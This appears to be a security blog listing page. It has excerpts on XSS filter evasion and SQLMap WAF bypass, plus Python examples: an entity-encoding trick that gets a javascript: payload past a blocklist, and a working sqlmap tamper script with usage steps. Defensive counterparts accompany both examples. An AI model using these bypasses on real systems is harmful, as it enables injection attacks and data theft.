Introduction I was busy playing my favorite game when an update notification from NVidia popped up. But before I got to update the software, it…
XSS Trick: Semi-colon and Forward slash not allowed?
In the screenshot below, you can see that we can inject our payload in full without breaking a sweat. But you may notice that our // isn’t reflected…
XSS Filter Evasion: Encoding to the rescue!
WHAT IS ENCODING? It is the process of converting data from one form to another using a publicly available scheme, so that it can easily be…
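Neither excerpt above shows its actual payload, so here is an added Python example (written for this page, not code from the original posts) of the general pattern the two XSS titles describe: a blocklist that rejects `;` and `/` on the raw input, and an encoding of those characters that passes the check but is decoded by the browser once the value is reflected into an attribute. The reflection into `href`, the forbidden-character set and the `javascript:` payload are constructed for the demo, and the choice of HTML numeric character references with no trailing `;` is an assumption about the trick, not taken from the posts. `html.unescape` from the standard library stands in for the browser's character-reference decoding; like the HTML parser, it accepts a numeric reference without a terminating semicolon.

```python
"""Added example: a blocklist on ';' and '/' checked on the raw input, and why
HTML character references get past it when the value lands in an attribute."""
import html
import re
import string
from urllib.parse import urlsplit

FORBIDDEN = frozenset(";/")   # the two characters the filter rejects (assumed)


def naive_filter_allows(user_input):
    """Blocklist on the raw input: reject anything containing ';' or '/'."""
    return not any(c in FORBIDDEN for c in user_input)


def entity_encode_forbidden(payload):
    """Rewrite each forbidden char as a hex character reference WITHOUT the
    trailing ';' (which we may not send). The HTML tokenizer still decodes
    '&#x2F': a missing semicolon is a parse error, not a rejection.
    Caveat: the reference ends at the first non-hex character, so a hex digit
    right after it would be absorbed into the code point; refuse those cases."""
    out = []
    for i, c in enumerate(payload):
        if c in FORBIDDEN:
            nxt = payload[i + 1:i + 2]
            if nxt and nxt in string.hexdigits:
                raise ValueError(f"{c!r} followed by hex digit {nxt!r} needs a ';'")
            out.append(f"&#x{ord(c):X}")
        else:
            out.append(c)
    return "".join(out)


def reflect_into_href(value):
    """Constructed vulnerable server side: the value is dropped into an
    attribute after the blocklist check, with no output encoding."""
    return f'<a href="{value}">profile</a>'


def browser_sees_href(markup):
    """Model the browser: take the attribute value and decode character
    references as the HTML parser does. html.unescape, like the parser,
    accepts numeric references with no terminating ';'."""
    m = re.search(r'href="([^"]*)"', markup)
    return html.unescape(m.group(1)) if m else ""


def hardened_filter_allows(user_input):
    """Decode before deciding, then allowlist: only http(s) URLs with a host
    pass, so 'javascript:' never reaches the attribute however it is spelled."""
    parts = urlsplit(html.unescape(user_input).strip())
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def reflect_safely(value):
    """Output encoding for the attribute context: '"' becomes '&quot;' and
    '&' becomes '&amp;', so the value cannot break out of the attribute."""
    return f'<a href="{html.escape(value, quote=True)}">profile</a>'


if __name__ == "__main__":
    payload = "javascript:alert(1);//"            # constructed test payload
    encoded = entity_encode_forbidden(payload)   # javascript:alert(1)&#x3B&#x2F&#x2F
    print(naive_filter_allows(payload), naive_filter_allows(encoded))  # False True
    print(browser_sees_href(reflect_into_href(encoded)))              # javascript:alert(1);//
    print(hardened_filter_allows(encoded))                             # False
```

The point to take away is the order of operations: the blocklist runs on the raw string, the browser decodes after the string has been placed in the page, so any check that does not decode first is comparing against something the browser never sees. The hardened version decodes, then allowlists the scheme, and still encodes on output.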
SQLMap: SQL Injection WAF Bypass
What is a WAF? A Web Application Firewall, a.k.a. WAF, acts as a “security guard” that inspects what goes in and out of a…
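sqlmap's mechanism for getting past a signature-based WAF is the tamper script, so below is an added Python example (written for this page, not sqlmap's own code or the post's) of a minimal tamper script together with a constructed toy signature WAF that shows what the transformation buys and what defeats it. The `tamper(payload, **kwargs)`, `dependencies()` and `__priority__` names follow sqlmap's tamper-script convention; the keyword list, the module name `altcase_comment` and the WAF signatures are assumptions for the demo.

```python
"""Hypothetical sqlmap tamper script (added example): alternate keyword case
and swap spaces for inline comments, then show what a signature WAF sees."""
import re

try:
    from lib.core.enums import PRIORITY  # present when sqlmap loads the script
    __priority__ = PRIORITY.LOW
except ImportError:                       # stand-alone run, e.g. the demo below
    __priority__ = 0

# Keywords whose case is alternated; chosen for the demo, extend as needed.
KEYWORDS = ("UNION", "SELECT", "FROM", "WHERE", "AND", "OR", "ORDER", "BY", "LIMIT")
_KEYWORD_RE = re.compile(r"\b(%s)\b" % "|".join(KEYWORDS), re.IGNORECASE)


def dependencies():
    pass  # sqlmap calls this so a script can check for extra modules


def _alternate_case(word):
    return "".join(c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(word))


def tamper(payload, **kwargs):
    """sqlmap entry point: 'UNION SELECT' -> 'UnIoN/**/SeLeCt'. MySQL treats
    /**/ as whitespace, so the query still parses the same server-side."""
    if not payload:
        return payload
    payload = _KEYWORD_RE.sub(lambda m: _alternate_case(m.group(1)), payload)
    return payload.replace(" ", "/**/")


# --- constructed toy WAF, to show what the tamper buys and what defeats it ---
_SIGNATURES = [re.compile(p, re.IGNORECASE) for p in (
    r"union\s+select",
    r"\bor\s+1\s*=\s*1",
    r"\bsleep\s*\(",
)]


def naive_waf_blocks(value):
    """Regexes over the raw parameter; \\s does not match '/**/'."""
    return any(s.search(value) for s in _SIGNATURES)


def normalizing_waf_blocks(value):
    """Same rules, but applied to the SQL the database would actually see:
    comments stripped, whitespace collapsed, so the tampered form is caught."""
    cleaned = re.sub(r"/\*.*?\*/", " ", value)
    cleaned = re.sub(r"\s+", " ", cleaned)
    return naive_waf_blocks(cleaned)


if __name__ == "__main__":
    raw = "1 UNION SELECT user,password FROM users"
    print(tamper(raw))
    print(naive_waf_blocks(raw), naive_waf_blocks(tamper(raw)), normalizing_waf_blocks(tamper(raw)))
```

To use it with sqlmap, drop the file into sqlmap's `tamper/` directory as `altcase_comment.py` and pass `--tamper=altcase_comment`; sqlmap calls `tamper()` on every payload it sends. The normalizing WAF is the practitioner's caveat: a rule set that canonicalizes the input (strip comments, collapse whitespace, fold case) before matching is not fooled by this script, which is why real tamper scripts are usually chained and chosen per target rather than applied blindly.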